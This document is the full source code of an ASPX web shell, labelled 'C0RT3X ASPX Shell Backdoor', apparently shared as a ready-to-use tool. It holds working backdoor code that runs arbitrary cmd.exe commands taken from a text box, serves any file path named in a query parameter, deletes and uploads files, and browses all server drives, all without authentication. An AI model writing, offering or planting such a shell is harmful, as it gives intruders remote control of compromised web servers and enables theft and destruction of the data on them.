SHELL ASPX

1. <%-- ASPX Shell by mB3m <mB3m> (2310) --%>
2. <%@ Page Language="C#" EnableViewState="false" %>
3. <%@ Import Namespace="System.Web.UI.WebControls" %>
4. <%@ Import Namespace="System.Diagnostics" %>
5. <%@ Import Namespace="System.IO" %>
6.  
7. <%
8. string outstr = "";
9.  
10. // get pwd
11. string dir = Page.MapPath(".") + "/";
12. if (Request.QueryString["fdir"] != null)
13. dir = Request.QueryString["fdir"] + "/";
14. dir = dir.Replace("\\", "/");
15. dir = dir.Replace("//", "/");
16.  
17. // build nav for path literal
18. string[] dirparts = dir.Split('/');
19. string linkwalk = "";
20. foreach (string curpart in dirparts)
21. {
22. if (curpart.Length == 0)
23. continue;
24. linkwalk += curpart + "/";
25. outstr += string.Format("<a href='?fdir={0}'>{1}/</a>&nbsp;",
26. HttpUtility.UrlEncode(linkwalk),
27. HttpUtility.HtmlEncode(curpart));
28. }
29. lblPath.Text = outstr;
30.  
31. // create drive list
32. outstr = "";
33. foreach(DriveInfo curdrive in DriveInfo.GetDrives())
34. {
35. if (!curdrive.IsReady)
36. continue;
37. string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
38. outstr += string.Format("<a href='?fdir={0}'>{1}</a>&nbsp;",
39. HttpUtility.UrlEncode(driveRoot),
40. HttpUtility.HtmlEncode(driveRoot));
41. }
42. lblDrives.Text = outstr;
43.  
44. // send file ?
45. if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0))
46. {
47. Response.ClearContent();
48. Response.WriteFile(Request.QueryString["get"]);
49. Response.End();
50. }
51.  
52. // delete file ?
53. if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0))
54. File.Delete(Request.QueryString["del"]);
55.  
56. // receive files ?
57. if(flUp.HasFile)
58. {
59. string fileName = flUp.FileName;
60. int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
61. if (splitAt >= 0)
62. fileName = flUp.FileName.Substring(splitAt);
63. flUp.SaveAs(dir + "/" + fileName);
64. }
65.  
66. // enum directory and generate listing in the right pane
67. DirectoryInfo di = new DirectoryInfo(dir);
68. outstr = "";
69. foreach (DirectoryInfo curdir in di.GetDirectories())
70. {
71. string fstr = string.Format("<a href='?fdir={0}'>{1}</a>",
72. HttpUtility.UrlEncode(dir + "/" + curdir.Name),
73. HttpUtility.HtmlEncode(curdir.Name));
74. outstr += string.Format("<tr><td>{0}</td><td><DIR></td><td></td></tr>", fstr);
75. }
76. foreach (FileInfo curfile in di.GetFiles())
77. {
78. string fstr = string.Format("<a href='?get={0}' target='_blank'>{1}</a>",
79. HttpUtility.UrlEncode(dir + "/" + curfile.Name),
80. HttpUtility.HtmlEncode(curfile.Name));
81. string astr = string.Format("<a href='?fdir={0}&del={1}'>Del</a>",
82. HttpUtility.UrlEncode(dir),
83. HttpUtility.UrlEncode(dir + "/" + curfile.Name));
84. outstr += string.Format("<tr><td>{0}</td><td>{1:d}</td><td>{2}</td></tr>", fstr, curfile.Length / 1024, astr);
85. }
86. lblDirOut.Text = outstr;
87.  
88. // exec cmd ?
89. if (txtCmdIn.Text.Length > 0)
90. {
91. Process p = new Process();
92. p.StartInfo.CreateNoWindow = true;
93. p.StartInfo.FileName = "cmd.exe";
94. p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
95. p.StartInfo.UseShellExecute = false;
96. p.StartInfo.RedirectStandardOutput = true;
97. p.StartInfo.RedirectStandardError = true;
98. p.StartInfo.WorkingDirectory = dir;
99. p.Start();
100.  
101. lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
102. txtCmdIn.Text = "";
103. }
104. %>
105.  
106. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
107.  
108. <html xmlns="http://www.w3.org/1999/xhtml" >
109. <head>
110. <title>C0RT3X ASPX Shell</title>
111. <style type="text/css">
112. * { font-family: Arial; font-size: 12px; }
113. body { margin: 0px; }
114. pre { font-family: Courier New; background-color: #CCCCCC; }
115. h1 { font-size: 16px; background-color: #00AA00; color: #FFFFFF; padding: 5px; }
116. h2 { font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
117. th { text-align: left; background-color: #99CC99; }
118. td { background-color: #CCFFCC; }
119. pre { margin: 2px; }
120. </style>
121. </head>
122. <body>
123. <h1>C0RT3X ASPX Shell Backdoor</h1>
124. <form id="form1" runat="server">
125. <table style="width: 100%; border-width: 0px; padding: 5px;">
126. <tr>
127. <td style="width: 50%; vertical-align: top;">
128. <h2>Shell</h2>
129. <asp:TextBox runat="server" ID="txtCmdIn" Width="300" />
130. <asp:Button runat="server" ID="cmdExec" Text="Execute" />
131. <pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre>
132. </td>
133. <td style="width: 50%; vertical-align: top;">
134. <h2>File Browser</h2>
135. <p>
136. Drives:<br />
137. <asp:Literal runat="server" ID="lblDrives" Mode="PassThrough" />
138. </p>
139. <p>
140. Working directory:<br />
141. <b><asp:Literal runat="server" ID="lblPath" Mode="passThrough" /></b>
142. </p>
143. <table style="width: 100%">
144. <tr>
145. <th>Name</th>
146. <th>Size KB</th>
147. <th style="width: 50px">Actions</th>
148. </tr>
149. <asp:Literal runat="server" ID="lblDirOut" Mode="PassThrough" />
150. </table>
151. <p>Upload to this directory:<br />
152. <asp:FileUpload runat="server" ID="flUp" />
153. <asp:Button runat="server" ID="cmdUpload" Text="Upload" />
154. </p>
155. </td>
156. </tr>
157. </table>
158.  
159. </form>
160. </body>
161. </html>